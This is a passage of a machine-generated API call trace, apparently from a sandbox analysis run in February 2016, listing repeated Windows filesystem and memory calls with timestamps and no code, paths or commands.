{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,508", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,528", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,528", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,528", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,538", "api": "NtFreeVirtualMemory"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,538", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,538", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,548", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,548", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:52,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,558", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,568", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,568", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,578", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:52,578", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,578", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,588", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,588", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,588", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,598", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,598", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,608", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,608", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,608", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,618", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,618", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,628", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,638", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,648", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,648", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:52,658", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,658", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,658", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:52,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,678", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,678", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,688", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,688", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,698", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,698", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,708", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,708", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,718", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,718", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,728", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,728", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,738", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,738", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,738", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,748", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,748", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,758", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,758", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:52,768", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,768", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,768", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,778", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,778", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:52,788", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,798", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,798", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,798", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,808", 